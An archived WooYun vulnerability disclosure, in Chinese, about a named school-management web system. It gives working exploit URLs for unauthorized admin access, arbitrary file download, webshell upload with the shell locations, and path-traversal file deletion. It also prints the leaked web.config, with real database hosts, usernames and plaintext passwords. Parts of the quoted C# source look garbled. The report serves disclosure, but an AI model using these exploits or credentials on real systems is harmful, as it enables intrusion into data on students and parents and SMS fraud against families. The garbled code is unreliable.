乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-14: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-01-25: 厂商已经主动忽略漏洞,细节向公众公开
天干物燥 小心火烛
学事通偶然看到的一个站,危害之一是可以利用该系统给学生家长群发诈骗短信http://www.njxt.net:800060.190.202.51
未授权访问http://www.njxt.net:8000/scmanage/index.aspx?sid=22&uname=0022029http://www.njxt.net:8000/scmanage/index.aspx?sid=52&uname=0193001http://www.njxt.net:8000/scmanage/index.aspx?sid=166&uname=0104060爆破学校ID,403则存在http://www.njxt.net:8000/image/studentimg/166/爆破学校账号应该也行,7位数,这里没有试
任意文件下载http://www.njxt.net:8000/ashx/download.ashx?/scManage/学事通校园管理员-最新版.pdfhttp://www.njxt.net:8000/ashx/download.ashx?/web.config <connectionStrings> <add name="SqlConnection" connectionString="server=60.190.202.36,14333\SZ;database=newSZJXT;uid=SZJXTUSER;pwd=DG8FV-B9TKY-FRT9J" /> <add name="EngelishConnection" connectionString="server=60.190.202.20;database=SZLXYY;uid=sa;pwd=linkivr" /> <add name="SMSConnction" connectionString="server=60.190.202.53,14333\SZ;database=SMS;uid=SZJXTUSER;pwd=DG8FV-B9TKY-FRT9J" /> <add name="xstSmsConn" connectionString="server=60.190.202.38,49469;database=XST;uid=sa;pwd=qaz!@#0401"/> </connectionStrings>
任意文件上传http://www.njxt.net:8000/scmanage/index.aspx?sid=166&uname=0104060学生管理,编辑,上传学生照片,直接传马,提交,再编辑,可得到马的完整地址http://www.njxt.net:8000/flash/up.swf?url=/ashx/SaveFile.ashx&Img=/image/studentimg/166/df4fe0d2-f2b2-4e8b-9d58-724fd2ce8caf.aspx&call=FlashCallhttp://www.njxt.net:8000/image/studentimg/166/df4fe0d2-f2b2-4e8b-9d58-724fd2ce8caf.aspx以上为测试删除文件前上传的,新的地址是:http://www.njxt.net:8000/image/studentimg/166/724e49b4-b103-47af-b07e-3ad66047f93a.aspx
http://www.njxt.net:8000/ashx/download.ashx?/ashx/SaveFile.ashxSaveFile.ashx源码:<%@ WebHandler Language="C#" Class="SaveFile" %>using System;using System.Web;using System.IO;public class SaveFile : IHttpHandler{ public void ProcessRequest(HttpContext context) { context.Response.ContentType = "text/plain"; var delName = context.Request["delName"]; if (!string.IsNullOrEmpty(delName)) { System.IO.File.Delete(context.Server.MapPath("/uploadtemp/" + delName)); context.Response.End(); } int length = context.Request.InputStream.Length.toString(0); if (length <= 0) return; byte[] buffer = new byte[length]; context.Request.Files["Filedata"].InputStream.Read(buffer, 0, length); string fileExt = Path.GetExtension(context.Request.Params[0].toString()).ToLower(); string name = Guid.NewGuid().toString() + fileExt; string path = HttpContext.Current.Server.MapPath("~/uploadtemp/" + name); System.IO.FileStream fs = new FileStream(path, FileMode.Create, FileAccess.Write); System.IO.BinaryWriter bw = new BinaryWriter(fs); bw.Write(buffer); bw.Close(); fs.Close(); context.Response.Write(name); } public bool IsReusable { get { return false; } }}
从源码发现,任意文件删除http://www.njxt.net:8000/ashx/SaveFile.ashx?delName=../image/studentimg/166/df4fe0d2-f2b2-4e8b-9d58-724fd2ce8caf.aspx
从图片文件夹路径看,大概有800个学校,一个学校几百学生,总人数还是很可观的
最后连接数据库看看:
没有进一步看,SHELL请自行删除。
无
未能联系到厂商或者厂商积极拒绝